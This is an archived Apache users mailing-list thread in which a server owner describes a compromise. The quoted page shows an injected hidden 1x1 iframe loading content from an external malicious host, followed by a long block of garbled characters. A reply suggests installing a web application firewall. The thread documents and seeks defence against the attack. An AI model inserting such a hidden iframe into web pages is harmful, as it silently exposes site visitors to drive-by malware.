httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Oleg Goryunov <oleg.goryu...@gmail.com>
Subject Re: [users@httpd] Someone hacked my apache2 server
Date Sun, 04 Apr 2010 08:43:43 GMT
I'm afraid I do not have WAF...
Oleg.

On Sun, Apr 4, 2010 at 6:55 AM, Gil Vidals <gvidals@gmail.com> wrote:

> Oleg,
>
> What kind of web application firewall (WAF) are you running on your web
> servers? If the answer is "none", then you will have many problems with
> malware and hackers.  You must have proper security. Google "mod_security"
> or hire a web security guy to take care of your servers for you.
>
> Gil Vidals
> www.vmracks.com
>
>
> On Sat, Apr 3, 2010 at 2:20 PM, Oleg Goryunov <oleg.goryunov@gmail.com>wrote:
>
>> Hello all,
>> It looks like someone hacked my apache2 server and I am trying to
>> understand how this could have happened.
>> This is what happened:
>> All of a sudden the server - in response to a web-browser request for a
>> page - started to give a full screen of unknown characters (looked like a
>> long text with encoding mismatch).
>> The output was immediate and the same for all the web-sites located on the
>> server.
>> Looking at the page source of the output I see the following:
>> =========
>>
>> <iframe src=  http://a z s x d e 5 5 . 9 9 6 6 . org:8800/ak47/29.html
>> width=1 height=1></iframe> Л ������ э[сn█8 ■▌�√
\-░{ ╘Ц '█&q ┤I щ]╙ф╥l{√
>> ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь  З╩Ё√Уєул▀.^СЙM
╣°їхЫ╫╟$шДсЗ┴q Ю\
>> ЭР Ю^Э╜!¤nП\i*
>>
>> ╖\I*┬Ё╒█А  k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6
     ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
>> 0┘ G й=  г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
>> MЮeJ█n  ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
>> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦
╦ни╩ўю╫ЛЛє╦л J
>> Ъ█Й╥ ╥ I╩%7░К █o
>>
>> HШЙ5╧p}+г
>> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟
∙lБ\B:e y  ├т;
>> Ч╫▐,B ! ╘2 .═" ╤) ╓]°  ═─a`@Y6╬-┴ЎАа └
>> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm
│.&cчВЩ      cАqЧbSy
>> ь┬SPХ─=├д        R├ пD▌ ЖЕ o
>>
>> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S
$.мO(0┌Аph╞╤  \Є╤l№
>> 4#·У'C.3┤      аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с  ·~
FZ∙d�0KJ.ю      bE╔йь╜┼g
>> ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8 Н3%┴ГCTE
кЖx─t╫o H щ█Ж!- Ф
>> ^  A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚ ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|x
>> Яп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS
 ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha
>> :"V сг╞i ╖Z@ Yў■ЕY,Р`- FE4Юa. ё Жv0и  Ї ^ЎdTуц┬A╬>t╨╡┘
 ЩМ╩г╙є│W }ё+▓ fUX
>> Зўs  -wвR F░∙Н╕5▐d ░Ч╛▒
>>
>>
>> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█   ╣н┌Г■{ х?ъ  uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m
>> ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx  1°/л1xQщ╕ ╝вУжEФ,".`н╞г\║нмa
E'YЇоЫ╚▐
>> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║  -д╚Ъ,i╔ТvЭ
¤╡"H пч¤Ў№° L╖W0Нsc┴ u
>> R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖  YR∙<}
█ ю О╕д╥-q ╖_╩╬{2Yхц╕╔
>> ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>>
>> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~
o╗╣ЫФа &28
>> ^╫@O}у:╨f -AпеЪ      ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═
5  1▄ И Яєцц|  ─w▄o
>> я 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
>> ╙v*чї8x~vётэow+v╨\ П ╥dJ!  │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
r┼м1С4Н8<╗kaЁ█C
>> ЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& |  ПжtXОH°┤╤¤ЖНАD▄┘Й
ю╕r ¤
>>
>> KV$Ч      ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦
> Ж ?>  ы'ci в╫i
>> �ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN
+бЇ>∙бч~ И;ўL  Oь>Сp
>> ╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш
fa,VWэДZWА¤ЬГ.эЬ°]Х ▄щсМ├
>>
>> би╝9сй+╬B  A& ╔-ЧnдUX▒uu вF В )Odф
>> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш
╪┤L SАД(
>> мм&╗Z3NvJ╣p шh╖w┬] ╦
>>
>>  С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>>  *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q      K#К3Fб:╚·1
 З ёqо]П█rА n:▀А╨
>> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜      Ыr
>>
>> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨   х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q
╒j ╒╢
>> B║  ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘
└Ю"ЛН┼LxЦA╪е╞н цмВY ёJф╢ЪЇ╓
>> ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a  ▓▐  69╖   АoX;wц
ыlэ╡s   YИLШ@   ╗ √C Zь р
>> "°ЄБPcЧa)gУeхд4NH┐  /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪      ф5X
р 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥№u
>> ╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>>
>> ==================
>> The address indicated in the begining of the page code leads to some
>> chinese server.
>>
>>
>> So, somehow it happened that the output of the apache server was
>> substituted by this page, which redirected visitors to some chinese server. It
>> is the second time I am posting to the mailing list, the first time the
>> mailing list virus scanner identified the content as having the
>> Troj/Fujif-Gen virus, thus, this time I removed active links from the
>> message body so it is not exactly what I received).
>>
>>
>> But the most strange thing was that the problem dissapeared itself! So, it
>> last for 10 minutes then disappeared! And the again started and again
>> dissapeared. Finally, I turned down apache untill I understand what is going
>> on...
>>
>> Any idea how could that happen?  How to reproduce this? How to prevent?
>> Where to look for logs? I have check both ssh logs and apache logs, there
>> is nothing that could seem unusual there...
>>
>> Any help is appreciated.
>> Oleg.
>>
>>
>
Mime
View raw message